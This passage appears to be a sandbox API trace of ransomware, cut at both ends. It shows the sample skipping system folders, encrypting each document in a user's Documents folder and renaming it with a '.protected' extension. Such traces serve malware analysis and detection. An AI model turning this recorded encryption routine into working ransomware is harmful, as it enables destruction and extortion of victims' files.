pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.310] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.310] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.310] lstrcmpiW (lpString1="3cCl4.xlsx", lpString2="Windows") returned -1 [0091.310] lstrcmpiW (lpString1="3cCl4.xlsx", lpString2="Program Files") returned -1 [0091.310] lstrcmpiW (lpString1="3cCl4.xlsx", lpString2="Program Files (x86)") returned -1 [0091.310] lstrcmpiW (lpString1="3cCl4.xlsx", lpString2="$Recycle.bin") returned 1 [0091.310] lstrcmpiW (lpString1="3cCl4.xlsx", lpString2="System Volume Information") returned -1 [0091.310] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3cCl4.xlsx") returned 54 [0091.310] StrStrIW (lpFirst="3cCl4.xlsx", lpSrch=".protected") returned 0x0 [0091.310] lstrcmpW (lpString1="3cCl4.xlsx", lpString2="RESTORE_FILES.txt") returned -1 [0091.310] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.310] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.310] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3cCl4.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3ccl4.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.311] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3cCl4.xlsx") returned 54 [0091.311] StrStrW (lpFirst="3cCl4.xlsx", lpSrch=".txt") returned 0x0 [0091.311] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3cCl4.xlsx") returned 54 [0091.311] StrStrW (lpFirst="3cCl4.xlsx", lpSrch=".rar") returned 0x0 [0091.311] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3cCl4.xlsx") returned 54 [0091.311] StrStrW (lpFirst="3cCl4.xlsx", lpSrch=".zip") returned 0x0 [0091.311] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.311] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.311] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.311] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.311] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.312] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.312] CloseHandle (hObject=0xb4) returned 1 [0091.312] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3cCl4.xlsx.protected") returned 64 [0091.312] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3cCl4.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3ccl4.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3cCl4.xlsx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\3ccl4.xlsx.protected")) returned 1 [0091.312] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.313] lstrcmpiW (lpString1="5LG8RS49-6.docx", lpString2="Windows") returned -1 [0091.313] lstrcmpiW (lpString1="5LG8RS49-6.docx", lpString2="Program Files") returned -1 [0091.313] lstrcmpiW (lpString1="5LG8RS49-6.docx", lpString2="Program Files (x86)") returned -1 [0091.313] lstrcmpiW (lpString1="5LG8RS49-6.docx", lpString2="$Recycle.bin") returned 1 [0091.313] lstrcmpiW (lpString1="5LG8RS49-6.docx", lpString2="System Volume Information") returned -1 [0091.313] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5LG8RS49-6.docx") returned 59 [0091.313] StrStrIW (lpFirst="5LG8RS49-6.docx", lpSrch=".protected") returned 0x0 [0091.313] lstrcmpW (lpString1="5LG8RS49-6.docx", lpString2="RESTORE_FILES.txt") returned -1 [0091.313] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.313] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.313] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5LG8RS49-6.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5lg8rs49-6.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.313] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5LG8RS49-6.docx") returned 59 [0091.313] StrStrW (lpFirst="5LG8RS49-6.docx", lpSrch=".txt") returned 0x0 [0091.313] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5LG8RS49-6.docx") returned 59 [0091.313] StrStrW (lpFirst="5LG8RS49-6.docx", lpSrch=".rar") returned 0x0 [0091.313] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5LG8RS49-6.docx") returned 59 [0091.313] StrStrW (lpFirst="5LG8RS49-6.docx", lpSrch=".zip") returned 0x0 [0091.313] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.314] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.314] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.314] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.314] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.314] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.314] CloseHandle (hObject=0xb4) returned 1 [0091.314] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5LG8RS49-6.docx.protected") returned 69 [0091.314] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5LG8RS49-6.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5lg8rs49-6.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5LG8RS49-6.docx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\5lg8rs49-6.docx.protected")) returned 1 [0091.315] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.315] lstrcmpiW (lpString1="69DV0.odp", lpString2="Windows") returned -1 [0091.315] lstrcmpiW (lpString1="69DV0.odp", lpString2="Program Files") returned -1 [0091.315] lstrcmpiW (lpString1="69DV0.odp", lpString2="Program Files (x86)") returned -1 [0091.315] lstrcmpiW (lpString1="69DV0.odp", lpString2="$Recycle.bin") returned 1 [0091.315] lstrcmpiW (lpString1="69DV0.odp", lpString2="System Volume Information") returned -1 [0091.315] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\69DV0.odp") returned 53 [0091.315] StrStrIW (lpFirst="69DV0.odp", lpSrch=".protected") returned 0x0 [0091.315] lstrcmpW (lpString1="69DV0.odp", lpString2="RESTORE_FILES.txt") returned -1 [0091.315] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.315] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.315] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\69DV0.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\69dv0.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.316] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\69DV0.odp") returned 53 [0091.316] StrStrW (lpFirst="69DV0.odp", lpSrch=".txt") returned 0x0 [0091.316] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\69DV0.odp") returned 53 [0091.316] StrStrW (lpFirst="69DV0.odp", lpSrch=".rar") returned 0x0 [0091.316] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\69DV0.odp") returned 53 [0091.316] StrStrW (lpFirst="69DV0.odp", lpSrch=".zip") returned 0x0 [0091.316] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.316] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.316] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.317] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.317] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.317] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.317] CloseHandle (hObject=0xb4) returned 1 [0091.317] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\69DV0.odp.protected") returned 63 [0091.317] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\69DV0.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\69dv0.odp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\69DV0.odp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\69dv0.odp.protected")) returned 1 [0091.319] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.319] lstrcmpiW (lpString1="6laUTce5IcKTdBZkA CW.xlsx", lpString2="Windows") returned -1 [0091.319] lstrcmpiW (lpString1="6laUTce5IcKTdBZkA CW.xlsx", lpString2="Program Files") returned -1 [0091.319] lstrcmpiW (lpString1="6laUTce5IcKTdBZkA CW.xlsx", lpString2="Program Files (x86)") returned -1 [0091.319] lstrcmpiW (lpString1="6laUTce5IcKTdBZkA CW.xlsx", lpString2="$Recycle.bin") returned 1 [0091.319] lstrcmpiW (lpString1="6laUTce5IcKTdBZkA CW.xlsx", lpString2="System Volume Information") returned -1 [0091.319] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6laUTce5IcKTdBZkA CW.xlsx") returned 69 [0091.319] StrStrIW (lpFirst="6laUTce5IcKTdBZkA CW.xlsx", lpSrch=".protected") returned 0x0 [0091.319] lstrcmpW (lpString1="6laUTce5IcKTdBZkA CW.xlsx", lpString2="RESTORE_FILES.txt") returned -1 [0091.319] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.319] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.319] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6laUTce5IcKTdBZkA CW.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\6lautce5icktdbzka cw.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.319] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6laUTce5IcKTdBZkA CW.xlsx") returned 69 [0091.319] StrStrW (lpFirst="6laUTce5IcKTdBZkA CW.xlsx", lpSrch=".txt") returned 0x0 [0091.319] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6laUTce5IcKTdBZkA CW.xlsx") returned 69 [0091.319] StrStrW (lpFirst="6laUTce5IcKTdBZkA CW.xlsx", lpSrch=".rar") returned 0x0 [0091.319] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6laUTce5IcKTdBZkA CW.xlsx") returned 69 [0091.319] StrStrW (lpFirst="6laUTce5IcKTdBZkA CW.xlsx", lpSrch=".zip") returned 0x0 [0091.319] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.320] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.320] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.320] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.320] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.320] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.320] CloseHandle (hObject=0xb4) returned 1 [0091.320] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6laUTce5IcKTdBZkA CW.xlsx.protected") returned 79 [0091.321] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6laUTce5IcKTdBZkA CW.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\6lautce5icktdbzka cw.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\6laUTce5IcKTdBZkA CW.xlsx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\6lautce5icktdbzka cw.xlsx.protected")) returned 1 [0091.321] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.321] lstrcmpiW (lpString1="7sC7dpJcfTod6UzuvWuT.pptx", lpString2="Windows") returned -1 [0091.321] lstrcmpiW (lpString1="7sC7dpJcfTod6UzuvWuT.pptx", lpString2="Program Files") returned -1 [0091.321] lstrcmpiW (lpString1="7sC7dpJcfTod6UzuvWuT.pptx", lpString2="Program Files (x86)") returned -1 [0091.321] lstrcmpiW (lpString1="7sC7dpJcfTod6UzuvWuT.pptx", lpString2="$Recycle.bin") returned 1 [0091.321] lstrcmpiW (lpString1="7sC7dpJcfTod6UzuvWuT.pptx", lpString2="System Volume Information") returned -1 [0091.321] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7sC7dpJcfTod6UzuvWuT.pptx") returned 69 [0091.321] StrStrIW (lpFirst="7sC7dpJcfTod6UzuvWuT.pptx", lpSrch=".protected") returned 0x0 [0091.321] lstrcmpW (lpString1="7sC7dpJcfTod6UzuvWuT.pptx", lpString2="RESTORE_FILES.txt") returned -1 [0091.321] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.321] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.321] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7sC7dpJcfTod6UzuvWuT.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\7sc7dpjcftod6uzuvwut.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.322] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7sC7dpJcfTod6UzuvWuT.pptx") returned 69 [0091.322] StrStrW (lpFirst="7sC7dpJcfTod6UzuvWuT.pptx", lpSrch=".txt") returned 0x0 [0091.322] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7sC7dpJcfTod6UzuvWuT.pptx") returned 69 [0091.322] StrStrW (lpFirst="7sC7dpJcfTod6UzuvWuT.pptx", lpSrch=".rar") returned 0x0 [0091.322] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7sC7dpJcfTod6UzuvWuT.pptx") returned 69 [0091.322] StrStrW (lpFirst="7sC7dpJcfTod6UzuvWuT.pptx", lpSrch=".zip") returned 0x0 [0091.322] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.322] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.323] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.323] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.323] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.323] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.323] CloseHandle (hObject=0xb4) returned 1 [0091.323] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7sC7dpJcfTod6UzuvWuT.pptx.protected") returned 79 [0091.323] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7sC7dpJcfTod6UzuvWuT.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\7sc7dpjcftod6uzuvwut.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7sC7dpJcfTod6UzuvWuT.pptx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\7sc7dpjcftod6uzuvwut.pptx.protected")) returned 1 [0091.324] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.324] lstrcmpiW (lpString1="8EyVjmEGj8d.xlsx", lpString2="Windows") returned -1 [0091.324] lstrcmpiW (lpString1="8EyVjmEGj8d.xlsx", lpString2="Program Files") returned -1 [0091.324] lstrcmpiW (lpString1="8EyVjmEGj8d.xlsx", lpString2="Program Files (x86)") returned -1 [0091.324] lstrcmpiW (lpString1="8EyVjmEGj8d.xlsx", lpString2="$Recycle.bin") returned 1 [0091.324] lstrcmpiW (lpString1="8EyVjmEGj8d.xlsx", lpString2="System Volume Information") returned -1 [0091.324] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8EyVjmEGj8d.xlsx") returned 60 [0091.324] StrStrIW (lpFirst="8EyVjmEGj8d.xlsx", lpSrch=".protected") returned 0x0 [0091.324] lstrcmpW (lpString1="8EyVjmEGj8d.xlsx", lpString2="RESTORE_FILES.txt") returned -1 [0091.324] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.324] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.324] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8EyVjmEGj8d.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8eyvjmegj8d.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.325] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8EyVjmEGj8d.xlsx") returned 60 [0091.325] StrStrW (lpFirst="8EyVjmEGj8d.xlsx", lpSrch=".txt") returned 0x0 [0091.325] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8EyVjmEGj8d.xlsx") returned 60 [0091.325] StrStrW (lpFirst="8EyVjmEGj8d.xlsx", lpSrch=".rar") returned 0x0 [0091.325] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8EyVjmEGj8d.xlsx") returned 60 [0091.325] StrStrW (lpFirst="8EyVjmEGj8d.xlsx", lpSrch=".zip") returned 0x0 [0091.325] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.325] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.325] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.325] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.326] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.326] WriteFile (in: 